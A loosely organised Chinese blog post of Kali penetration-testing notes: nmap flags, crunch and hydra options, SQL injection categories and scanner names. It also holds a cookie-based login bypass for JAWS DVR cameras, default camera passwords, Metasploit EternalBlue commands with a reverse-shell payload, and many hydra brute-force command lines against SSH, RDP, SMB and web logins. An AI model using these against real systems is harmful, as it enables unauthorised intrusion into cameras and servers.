web安全笔记-kali渗透-（比较乱主要记录工具方法）

喜欢ヅ旅行 2022-12-16 05:57 93阅读 0赞

# kali更新MFS #

1. 更换yum源地址
    2. 添加kali数字签名
    3. 如果出现无法更新建议卸载MFS之后在安装
    4. sudo rm 对锁强制解锁进行安装
    5. 启动数据库 postgresql 设置开机自动启动

## 撒旦之眼 ##

https://www.shodan.io/

在输入框输入 prot:3389 os:windows

## 摄像头 ##

JAWS/1.1

### 输入 ###

document.cookie="dvr_camcnt=4";
    document.cookie="dvr_usr=admin";
    document.cookie="dvr_pwd=123";

在url 后面加上 10.1.1.1:8080//view2.html

## 摄像头2 ##

### 海康威视 ###

admin 123456

### 大华网络摄像机 ###

admin 888888

### 天地伟业 ###

Admin 111111

Hikvision

Server:DVRDVS-Webs

## msfconsole 工具开启 (永恒之蓝) ##

1.开启命令

msfconsole
    search ms17-010
    use exploit/windows/smb/ms17_010_eternalblue
    set payload windows/x64/meterpreter/reverse_tcp
    set RHOSTS *(目标ip)
    set LHOST (本地ip)

# nmap #

nmap -sP ip地址 /24  不指定端口
    	-p 指定端口
    	-p-全端口
    -sT TCP全连接扫描 会留下记录
    扫描方法：nmap扫描类型主要有TCP的全连接扫描（会在被扫描机器留下记录），半连接扫描（不会留下记录），FIN扫描（可以判断对方操作系统的类型）。
    -sS TCP半连接扫描  
    -sN 隐蔽扫描
    -sX 隐蔽扫描
    -sF 隐蔽扫描
    -O 对方系统类型 （不太准确）
    -oN/oX   txt/xml

## 字典生成工具 crunch ##

参数详解
    
         min    设定最小字符串长度（必选）
         max    设定最大字符串长度（必选）
         
         oprions
         -b     指定文件输出的大小，避免字典文件过大  
         -c     指定文件输出的行数，即包含密码的个数
         -d     限制相同元素出现的次数
         -e     定义停止字符，即到该字符串就停止生成
         -f     调用库文件（/etc/share/crunch/charset.lst）
         -i     改变输出格式，即aaa,aab -> aaa,baa
         -I     通常与-t联合使用，表明该字符为实义字符
         -m     通常与-p搭配
         -o     将密码保存到指定文件
         -p     指定元素以组合的方式进行
         -q     读取密码文件，即读取pass.txt
         -r     定义重某一字符串重新开始
         -s     指定一个开始的字符，即从自己定义的密码xxxx开始
         -t     指定密码输出的格式
         -u     禁止打印百分比（必须为最后一个选项）
         -z     压缩生成的字典文件，支持gzip,bzip2,lzma,7z

# CUPP #

CUPP是一个非常强大的工具，专门为一个人创建一个词汇表。CUPP是跨平台的，用Python编写。CUPP向您询问有关目标（姓名，妻子姓名，宠物名称......）的问题，然后根据您输入的关键字创建一个密码。

# hydra (九头蛇 在线破解工具) #

**一、简介**  
hydra是著名黑客组织thc的一款开源的暴力密码破解工具，可以在线破解多种密码。  
官 网：http://www.thc.org/thc-hydra。

可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL , NCP, NNTP, Oracle Listener , Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。

**二、安装**  
Hydra 安装

# wget --no-check-certificate https://www.thc.org/releases/hydra-8.1.tar.gz
    # tar zxvf hydra-8.1.tar.gz 
    # cd hydra-8.1 
    # ./configure 
    # make && make install 
     
    三、参数说明 
     
    hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] 
     
    [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] 
     
    -R 继续从上一次进度接着破解。 
     
    -S 采用SSL链接。 
     
    -s PORT 可通过这个参数指定非默认端口。 
     
    -l LOGIN 指定破解的用户，对特定用户破解。 
     
    -L FILE 指定用户名字典。 
     
    -p PASS 小写，指定密码破解，少用，一般是采用密码字典。 
     
    -P FILE 大写，指定密码字典。 
     
    -e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。 
     
    -C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。 
     
    -M FILE 指定目标列表文件一行一条。 
     
    -o FILE 指定结果输出文件。 
     
    -f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。 
     
    -t TASKS 同时运行的线程数，默认为16。 
     
    -w TIME 设置最大超时的时间，单位秒，默认是30s。 
     
    -v / -V 显示详细过程。 
     
    server 目标ip 
     
    service 指定服务名，支持的服务和协议：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt 
    http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc 
    ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec 
    rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere 
    teamspeak sip vmauthd firebird ncp afp等等。 
     
    OPT 可选项

**四、各种用法实例** ：

1、破解ssh： 
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh 
    hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 
     
     
    2、破解ftp： 
    hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV 
    hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 
     
     
    3、get方式提交，破解web登录： 
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ 
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
     
     
    4、post方式提交，破解web登录： 
    hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" 
    hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>" 
    （参数说明：-t同时线程数3，-l用户名是admin，字典pass.txt，保存为out.txt，-f 当破解了一个密码就停止， 10.36.16.18目标ip，http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。） 
     
     
    5、破解https： 
    hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 
     
     
     
    6、破解teamspeak： 
    hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 
     
     
     
    7、破解cisco： 
    hydra -P pass.txt 10.36.16.18 cisco 
    hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 
     
     
     
    8、破解smb： 
    hydra -l administrator -P pass.txt 10.36.16.18 smb 
     
     
     
    9、破解pop3： 
    hydra -l muts -P pass.txt my.pop3.mail pop3 
     
     
     
    10、破解rdp： 
    hydra ip rdp -l administrator -P pass.txt -V 
     
     
     
    11、破解http-proxy： 
    hydra -l admin -P pass.txt http-proxy://10.36.16.18 
     
     
     
    12、破解imap： 
    hydra -L user.txt -p secret 10.36.16.18 imap PLAIN 
    hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

## theHarvester 邮箱搜集 ##

# 黑帽大牛网站 http://caidaome.com/?sort=5 #

# SQL 注入 #

服务器提权 mof | udf 提权

## sql注入分类 ##

1.数字型  
2.字符型

### 注入手法 ###

1 联合查询注入  
2 报错型注入  
3 布尔型注入  
4 基于时间延迟注入  
5 可多语句查询注入

# 渗透软件 #

### DirBuster ###

DirBuster是Owasp(Open Web APPlication Security Project )开发的一款专门用于探测网站目录和文件(包括隐藏文件)的工具。由于使用java编写，电脑中要装有JDK才能运行

### 御剑 ###

github地址 https://github.com/foryujian/yjdirscan

# 火狐工具 wappalyzer #

Wappalyzer是一款能够分析目标网站所采用的平台构架、网站环境、服务器配置环境、JavaScript框架、编程语言等参数的chrome网站技术分析插件。

# 渗透环境搭建模型 dvwa #

# 图片木马制作 #

edjpgcom 图片木马

# web扫描软件 #

### AppScan ###

### BurpSuite ###

### arachni ###

# 防御暴力破解 #

1.useradd yangge -s /sbin/nologin
    2.秘密复杂性 
    大小写+数字+特殊符号+20为以上+定期更换
    3修改默认端口
    4.限制登陆的用户组或者数据
    5.使用sudo
    6.基于PAM 实现登陆限制
    auth required pam_tally2.so deny=2 even_deny_root root_unlock_time=60 unlock_time=6

## 指纹识别工具 ##

### 国外指纹识别工具 whatweb ###

### 获取网站信息插件 Web Developer ###